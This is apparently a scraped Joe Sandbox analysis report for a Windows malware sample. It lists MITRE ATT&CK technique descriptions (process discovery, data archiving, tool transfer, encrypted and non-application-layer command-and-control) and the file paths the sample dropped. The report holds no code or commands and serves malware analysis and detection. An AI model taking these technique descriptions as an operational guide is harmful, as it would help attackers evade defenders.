Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 13478674376-78423498.01.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\9eAesx\FLgX3z.exe

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\b[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\s[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\d[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\f[1].dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\FOM-50[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\a[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\s[1].dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\c[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\drops[1].jpg

C:\Users\user\Documents\4mPVjj.exe

C:\Users\user\Documents\MsMpList.dat

C:\Users\user\Documents\WordpadFilter.db

Windows Analysis Report
13478674376-78423498.01.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre